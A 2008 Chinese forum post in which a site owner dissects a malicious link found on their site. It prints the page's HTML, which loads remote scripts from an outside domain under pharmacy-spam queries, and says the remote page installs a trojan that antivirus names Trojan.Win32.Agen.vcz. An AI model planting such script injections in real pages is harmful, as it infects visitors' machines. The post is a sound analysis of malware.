发表于: 2008-02-23 20:38 | 显示全部 短消息 资料
字号: 1楼

【原创】解剖病毒,露出原型

一天在自己的网站上发现了如下地址:
<a href= http://ezgwa.com/ugtytgty.html >Google</a>
其中IP地址及时间隐藏(不知道这位是怎样做到的)。
用下载软件输入地址http://ezgwa.com/ugtytgty.html 下载下来才看出是个带有病毒的网页。如下示:
<script>
function init_aw(){
    var children = document.getElementsByTagName('td');
    var l = children.length;
    var ri = 0;
    for(i=0;i<l;i++){
    if (children.className=='ac'){
       children.onmouseover=function (){this.className='ach';};
       children.onmouseout=function (){this.className='ac';};
       children.onclick=new Function('document.location="' + results[ri][3] + '";');
       ri++;
    }
    }
}
</script>
</head>
<body>
<script src="http://ultrasearchonline.info/js.php?pin=xNOujrA%3D&qr=4&f=h&q=tramadol"></script>
<script>document.onload=init_aw();</script>
<script src="http://ultrasearchonline.info/js.php?pin=xNOujrA%3D&qr=4&f=h&q=viagra"></script>
<script>document.onload=init_aw();</script>
<script src="http://ultrasearchonline.info/js.php?pin=xNOujrA%3D&qr=4&f=h&q=levitra"></script>
<script>document.onload=init_aw();</script>
<script src="http://ultrasearchonline.info/js.php?pin=xNOujrA%3D&qr=4&f=h&q=cialis"></script>
<script>document.onload=init_aw();</script>
<script src="http://ultrasearchonline.info/js.php?pin=xNOujrA%3D&qr=4&f=h&q=carisoprodol"></script>
<script>document.onload=init_aw();</script>
<script src="http://ultrasearchonline.info/js.php?pin=xNOujrA%3D&qr=4&f=h&q=xanax"></script>
<script>document.onload=init_aw();</script>
</body>
</html>
接着我们再下载其中的页面:http://ultrasearchonline.info/js.php?pin=xNOujrA%3D&qr=4&f=h&q=tramadol用记事本打开就会发现病毒作者精心制作的病毒及安装过程。
喜欢研究病毒的朋友随便下载一个可执行文件脱壳即可。
经过瑞星杀毒软件查杀属于“Trojan.Win32.Agen.vcz”病毒。

直到现在我不明天病毒作者是如果隐藏自己的IP信息及时间信息的?有知道的告诉一下,谢谢。

[用户系统信息]Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

附件附件:

下载次数:100
文件类型:application/octet-stream
文件大小:
上传时间:2008-2-23 20:38:09
描述:

最后编辑2008-02-23 20:38:09.293000000